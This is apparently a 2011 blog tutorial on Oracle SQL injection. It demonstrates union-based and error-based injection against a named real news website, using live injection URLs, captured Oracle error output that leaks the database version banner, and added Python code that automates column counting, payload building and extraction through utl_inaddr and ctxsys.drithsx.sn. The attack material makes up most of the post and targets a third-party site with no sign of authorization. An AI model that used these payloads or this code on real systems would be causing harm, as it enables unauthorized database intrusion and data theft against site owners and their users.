Monday, May 30, 2011

Oracle Database Injection


So let's play with Oracle database injection.
Our target:
http://www3.inn.cl
First, union-based injection.

1 - We start by checking for the vuln by appending a single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
If it is vulnerable, it throws an error:
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
We can see ORA-01756, and that immediately tells us this is Oracle injection, right? The ORA- prefix identifies the backend as Oracle, and ORA-01756 in particular means our quote reached the SQL parser unescaped: the parameter is concatenated straight into the statement.


2 - We find the number of columns as usual: order by 1-- and count upwards until we get an error (on Oracle that is ORA-01785, raised when the ORDER BY position exceeds the select list).
On this site, the number of columns = 9.
3 - So we continue with our union injection.
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
No column number shows up on the page here, so we look at the error.
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

FROM keyword not found means this injection needs a FROM clause: unlike MySQL, Oracle does not accept a SELECT without one, so constants have to be selected FROM dual.
For reference:
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Before that, we need to NULL out every column position first, the same as in PostgreSQL injection: NULL is compatible with any column type, so the UNION parses without datatype errors, and the negative id makes the original query return no rows so that our UNION row is the one rendered (with FROM dual appended, since Oracle rejects a SELECT without a FROM clause).
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null FROM dual--

To find out which column we can inject into, change the nulls to 0 one at a time.
In this case, putting 0 in the first column gave no error, but an error appeared when the 0 was in the second column.
That means the second column is the one we can inject into: a 0 is only rejected (ORA-01790, datatype mismatch) where the original column is not numeric, so the error marks a character column, which is where a string such as the version banner can be displayed.


4 - In this tutorial we will only inject and extract up to the version banner; the rest you can test yourselves.
From pentestmonkey, there are 3 queries for checking the version:
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


So we just take the first one for testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production




So.. it worked.
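The column-count walk, the NULL-then-0 probing and the reading of Oracle's error codes from steps 1 to 4, as an added Python example that is not part of the original post. It runs against a constructed stand-in for the page (nine result columns, with positions 2, 3 and 8 character-typed; an assumption for the demo, not the site's real schema) so it works offline. The ORA-00923 line is the page's own; the other codes are Oracle's documented ones and do not appear on this page.

```python
import re
from typing import Callable, Dict, List, Optional

ORA_RE = re.compile(r"ORA-(\d{5})")

# What each Oracle error code tells the tester at this stage of a UNION injection.
# Oracle's documented codes; only 01756 and 00923 appear on the page itself.
ORA_MEANING: Dict[str, str] = {
    "01756": "quoted string not properly terminated: the quote reached the SQL parser",
    "01785": "ORDER BY position past the select list: column count is one less",
    "00923": "FROM keyword not found: Oracle needs FROM dual for a constant SELECT",
    "01789": "UNION branches have different column counts",
    "01790": "datatype mismatch: this position is not NUMBER, so it can carry text",
}


def ora_code(response: str) -> Optional[str]:
    """Return the first ORA-xxxxx code found in a response body, or None."""
    m = ORA_RE.search(response)
    return m.group(1) if m else None


def union_payload(ncols: int, values: Dict[int, str], base_id: str = "-2372") -> str:
    """UNION branch with NULL in every position except those given in `values` (1-based).

    The negative id empties the original branch so the UNION row is what gets rendered,
    and FROM dual satisfies Oracle's requirement for a FROM clause.
    """
    cols = ",".join(values.get(i, "null") for i in range(1, ncols + 1))
    return f"{base_id} UNION SELECT {cols} FROM dual--"


def find_column_count(send: Callable[[str], str], base_id: str = "2372", limit: int = 30) -> int:
    """Walk ORDER BY n upwards; the first ORA-01785 means the select list has n-1 columns."""
    for n in range(1, limit + 1):
        if ora_code(send(f"{base_id} order by {n}--")) == "01785":
            return n - 1
    raise RuntimeError(f"no ORA-01785 within {limit} columns")


def find_text_columns(send: Callable[[str], str], ncols: int, base_id: str = "-2372") -> List[int]:
    """Swap NULL for 0 one position at a time; positions raising ORA-01790 are not NUMBER."""
    hits = []
    for i in range(1, ncols + 1):
        if ora_code(send(union_payload(ncols, {i: "0"}, base_id))) == "01790":
            hits.append(i)
    return hits


# Constructed stand-in for the vulnerable page so this runs offline.
# Nine result columns, positions 2, 3 and 8 VARCHAR2: an assumption for the
# demo, not the real site's schema.
FAKE_TYPES = ["NUMBER", "VARCHAR2", "VARCHAR2", "NUMBER", "NUMBER",
              "NUMBER", "NUMBER", "VARCHAR2", "NUMBER"]


def fake_target(param: str) -> str:
    """Mimic Oracle's reaction to the id parameter: empty string if the query ran."""
    m = re.search(r"order by (\d+)", param, re.I)
    if m:
        if int(m.group(1)) > len(FAKE_TYPES):
            return "Warning: ociexecute(): ORA-01785: ORDER BY item must be the number of a SELECT-list expression"
        return ""
    m = re.search(r"UNION SELECT (.+?)(?: FROM dual)?--", param, re.I)
    if not m:
        return ""
    if not re.search(r"\bFROM\b", param, re.I):
        return "Warning: ociexecute(): ORA-00923: FROM keyword not found where expected"
    cols = [c.strip() for c in m.group(1).split(",")]
    if len(cols) != len(FAKE_TYPES):
        return "Warning: ociexecute(): ORA-01789: query block has incorrect number of result columns"
    for val, typ in zip(cols, FAKE_TYPES):
        if re.fullmatch(r"-?\d+", val) and typ != "NUMBER":
            return "Warning: ociexecute(): ORA-01790: expression must have same datatype as corresponding expression"
    return ""


if __name__ == "__main__":
    n = find_column_count(fake_target)
    print("columns:", n)                                        # 9
    print("text columns:", find_text_columns(fake_target, n))   # [2, 3, 8]
    print(union_payload(n, {2: "banner"}))
```

Against a real target, `send` would be an HTTP GET that returns the response body; the only thing the probing logic needs from it is the ORA- code, which is why the page's verbose PHP warnings make this so easy. The same walk works for any column count, not just the 9 found here.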
----------------------------------------------------------------------------------------------------------
For error-based, we usually use or 1=1 / or 1=2 to confirm the injection, then wrap the subquery in a function whose error message echoes its argument:
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
The function utl_inaddr.get_host_address only works like this when the Oracle version is 10g or below. On 11g, UTL_INADDR is subject to the network ACL introduced in that release and fails with ORA-24247 unless the application's database user has been granted access, so there we need to use

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
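The error-based carriers for 10g and 11g, as an added Python example that is not part of the original post. It builds the payload around any scalar subquery and pulls the leaked value back out of the error text. The ORA-29257 response is the one shown above; the DRG-11701 message format for ctxsys.drithsx.sn, the ORA-24247 check and the 11g banner in SAMPLE_11G are assumed or constructed, not captured from any site.

```python
import re
from typing import Optional, Tuple

# Each carrier function embeds the subquery's value in the error it raises:
# UTL_INADDR because the value is not a resolvable host name, CTXSYS.DRITHSX.SN
# because it is not an existing thesaurus. The ORA-29257 format is the one shown
# on this page; the DRG-11701 format is assumed from Oracle Text, not from the page.
LEAK_PATTERNS = (
    ("utl_inaddr", re.compile(r"ORA-29257: host (.+?) unknown")),
    ("drithsx", re.compile(r"DRG-11701: thesaurus (.+?) does not exist")),
)

# ORA-24247 is what 11g returns when UTL_INADDR is called without a network ACL grant.
ACL_BLOCKED = re.compile(r"ORA-24247")


def error_based_payload(subquery: str, oracle_major: int = 10, param_value: str = "2372") -> str:
    """Append an OR clause whose right side forces the subquery's value into an error."""
    if oracle_major >= 11:
        return f"{param_value} or 1=ctxsys.drithsx.sn(1,({subquery}))"
    return f"{param_value} or 1=utl_inaddr.get_host_address(({subquery}))"


def extract_leaked(response: str) -> Optional[Tuple[str, str]]:
    """Return (carrier, leaked value) if the response carries a value, else None."""
    for carrier, pattern in LEAK_PATTERNS:
        m = pattern.search(response)
        if m:
            return carrier, m.group(1)
    return None


def next_step(response: str) -> str:
    """Decide what the response means for the tester."""
    leaked = extract_leaked(response)
    if leaked:
        return f"leak via {leaked[0]}: {leaked[1]}"
    if ACL_BLOCKED.search(response):
        return "UTL_INADDR blocked by the 11g network ACL: switch to ctxsys.drithsx.sn"
    return "no value in the error text: check the payload or try the other carrier"


# Response shown on the page for the 10g payload.
SAMPLE_10G = ("Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g "
              "Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at \"SYS.UTL_INADDR\", "
              "line 19 ORA-06512: at \"SYS.UTL_INADDR\", line 40 ORA-06512: at line 1")
# Constructed response for the 11g carrier (not captured from any site).
SAMPLE_11G = ("ORA-20000: Oracle Text error: DRG-11701: thesaurus Oracle Database 11g "
              "Enterprise Edition Release 11.2.0.1.0 - Production does not exist")

BANNER_QUERY = "SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'"

if __name__ == "__main__":
    print(error_based_payload(BANNER_QUERY))
    print(next_step(SAMPLE_10G))
    print(next_step(SAMPLE_11G))
```

Because the subquery has to return a single scalar, anything multi-row (table names, user lists) needs a ROWNUM=1 filter or an aggregation inside the parentheses; the parser above does not care what was asked, only where the answer lands in the message.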


Credit to : p0pc0rn @tbd.my 


1 comment:

Anonymous said...

Very nice tutorial, bro..

F3bby
